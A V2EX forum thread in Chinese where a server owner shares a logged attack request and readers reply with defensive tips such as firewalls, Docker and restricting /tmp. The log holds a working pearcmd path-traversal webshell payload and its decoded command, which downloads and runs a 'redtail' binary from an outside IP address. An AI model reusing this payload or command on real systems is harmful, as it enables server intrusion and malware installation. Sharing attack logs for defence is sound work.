每天都在往我的小主机里面搞事情

339 天前
 rainABC

request: "GET /index.php?lang=../../../../../../../../usr/local/lib/php/pearcmd&+config-create+/&/<?

shell_exec(base64_decode("bWtkaXIgLXAgL3RtcC8kKHdob2FtaSkgJiYgY2QgL3RtcC8kKHdob2Ft aSk7IHdnZXQgaHR0cDovLzQ1Ljk1LjE0Ny4yMzYvZG93bmxvYWQvcmVkdGFpbC54ODZfNjQ7IGN1 cmwgLU8gaHR0cDovLzQ1Ljk1LjE0Ny4yMzYvZG93bmxvYWQvcmVkdGFpbC54ODZfNjQ7IHJtIC1yZiAuc mVkdGFpbDsgbXYgcmVkdGFpbC54ODZfNjQgLnJlZHRhaWw7IGNobW9kICt4IC5yZWR0YWlsOyAuLy5yZWR0YWls")); ?>+/tmp/ohhellohttpserver.php HTTP/1.1",


mkdir -p /tmp/$(whoami) && cd /tmp/$(whoami); wget http://45.95.147.236/download/redtail.x86_64; curl -O http://45.95.147.236/download/redtail.x86_64; rm -rf .redtail; mv redtail.x86_64 .redtail; chmod +x .redtail; ./.redtail

每天都在往我的小主机里面搞事情,做好防护很重要。

2742 次点击
所在节点    程序员
8 条回复
RDannelOlivaw
339 天前
什么意思,大佬帮忙解释下
pota
339 天前
常见的注入。加一个防火墙吧
nodejsexpress
339 天前
反正我都部署到 docker 里面,随便它折腾。数据一天 backup 一次
buffzty
339 天前
只开一个 wireguard 端口 省心省事
yumusb
339 天前
互联网中“互联”二字有何含义?
relife
338 天前
用 acl 限制用户对/tmp 的访问,反正是服务用户又不是桌面用户。我服务器也被黑了好几次写到/tmp 下面
puputeju
338 天前
这是被攻击了吗
FeranyDev
338 天前
所有为什么还在用 PHP

这是一个专为移动设备优化的页面(即为了让你能够在 Google 搜索结果里秒开这个页面),如果你希望参与 V2EX 社区的讨论,你可以继续到 V2EX 上打开本讨论主题的完整版本。

https://www.v2ex.com/t/1011837

V2EX 是创意工作者们的社区,是一个分享自己正在做的有趣事物、交流想法,可以遇见新朋友甚至新机会的地方。

V2EX is a community of developers, designers and creative people.

© 2021 V2EX